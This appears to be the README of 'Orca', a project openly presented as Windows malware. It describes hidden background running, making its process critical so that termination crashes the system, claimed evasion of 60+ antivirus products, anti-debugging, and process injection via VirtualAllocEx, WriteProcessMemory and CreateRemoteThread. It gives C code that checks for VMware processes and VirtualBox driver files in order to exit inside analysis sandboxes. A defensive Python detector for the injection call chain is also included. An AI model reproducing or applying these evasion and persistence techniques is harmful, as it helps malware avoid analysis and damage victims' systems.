
ZeroM3m0ry / Orca

Licence: other
Advanced malware with multiple features, written in ASM/C/C++; works on all Windows versions (incomplete)


About Orca

  • Orca is advanced malware with multiple features, written in ASM/C/C++

Features

  • Run in Background (Hidden Mode)

Critical Process using RtlSetProcessIsCritical

  • RtlSetProcessIsCritical makes the process critical: any attempt to terminate it will BSOD the system (Blue Screen of Death). It can, however, be bypassed easily using NtSetInformationProcess by injecting a DLL into the process. I made a PoC of it, which you can check here: BypassRtlSetProcessIsCritical


  • Undetectable (60+ antivirus)


Detecting Virtual Environment Files and Processes

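  • Code snippets
  • The following function searches for VMware processes:
void antiVm()
{
	/* Process names that ship with VMware Tools; GetPID() is a helper defined elsewhere in the project. */
	const char* arr[] = { "vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe" ,"VGAuthService.exe" ,"vmacthlp.exe" };
	/* Loop over the number of entries in the array. */
	for (size_t i = 0; i < sizeof(arr) / sizeof(arr[0]); i++)
	{
		if (GetPID(arr[i]))
			exit(EXIT_FAILURE);
	}
}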
  • The following function searches for VirtualBox files:
void antiVr() {
	if  (IsExist("C:\\windows\\System32\\vboxoglpackspu.dll"))exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxSF.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxVideo.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglpassthroughspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxdisp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxhook.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxmrxnp.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxogl.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglcrutil.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxGuest.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglerrorspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglfeedbackspu.dll")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\Drivers\\VBoxMouse.sys")) exit(EXIT_FAILURE);
	else if (IsExist("C:\\windows\\System32\\vboxoglarrayspu.dll")) exit(EXIT_FAILURE);
}

Anti-Debug

  • The malware closes itself silently whenever it detects a debugger or that it is being debugged (AntiDBG Library)
  • The techniques used to detect debuggers:
  - Memory
  - CPU
  - Timing
  - Forced Exceptions

Process Injection

  • Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.


TECHNICAL DETAILS

  • Open the process with access rights
  • LPTHREAD_START_ROUTINE (a pointer to the application-defined function to be executed by the thread; it represents the starting address of the thread in the remote process. The function must exist in the remote process.)
  • VirtualAllocEx (used to allocate space in the target process's virtual memory)
  • WriteProcessMemory (used to write the path of the shellcode into the allocated memory)
  • CreateRemoteThread (used to create a thread in the virtual memory area of a process)
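
From the detection side, the call chain listed above is a recognisable behavioural pattern. The following is an added example, not part of the Orca project: it scans an API call trace for one process completing the chain against a different process. The trace format (time, calling pid, API name, target pid with handles already resolved) and the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict

# Ordered call chain from the list above; other calls may be interleaved.
CHAIN = ("OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")

# Constructed sample trace, not captured from a real system.
SAMPLE_TRACE = """\
10.001 4120 OpenProcess 888
10.002 4120 ReadFile -
10.004 4120 VirtualAllocEx 888
10.005 5000 OpenProcess 888
10.006 4120 WriteProcessMemory 888
10.007 5000 ReadProcessMemory 888
10.009 4120 CreateRemoteThread 888
10.020 6100 VirtualAllocEx 6100
10.021 6100 WriteProcessMemory 6100
10.022 6100 CreateRemoteThread 6100
"""

def parse(trace):
    """Yield (time, caller_pid, api, target_pid or None) per non-empty line."""
    for line in trace.splitlines():
        if not line.strip():
            continue
        ts, pid, api, target = line.split()
        yield float(ts), int(pid), api, (None if target == "-" else int(target))

def find_injection_chains(trace, window=5.0):
    """Return (caller, target, start, end) for each pair completing CHAIN in order."""
    progress = defaultdict(lambda: [0, None])  # (caller, target) -> [next stage, start time]
    hits = []
    for ts, caller, api, target in parse(trace):
        if target is None or target == caller:
            continue  # only cross-process operations are of interest
        state = progress[(caller, target)]
        if state[0] and ts - state[1] > window:
            state[:] = [0, None]  # partial chain went stale, start over
        if api == CHAIN[state[0]]:
            if state[0] == 0:
                state[1] = ts
            state[0] += 1
            if state[0] == len(CHAIN):
                hits.append((caller, target, state[1], ts))
                state[:] = [0, None]
    return hits

if __name__ == "__main__":
    for caller, target, start, end in find_injection_chains(SAMPLE_TRACE):
        print(f"pid {caller} -> pid {target}: injection chain, t={start}..{end}")
```

In the sample, only pid 4120 is reported: pid 5000 opens and reads the target without allocating or starting a thread, and pid 6100 operates on its own address space.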

More Advanced features will be added soon

Disclaimer

  • I take no responsibility for harmful use or any damage it can cause. Use it at your own risk.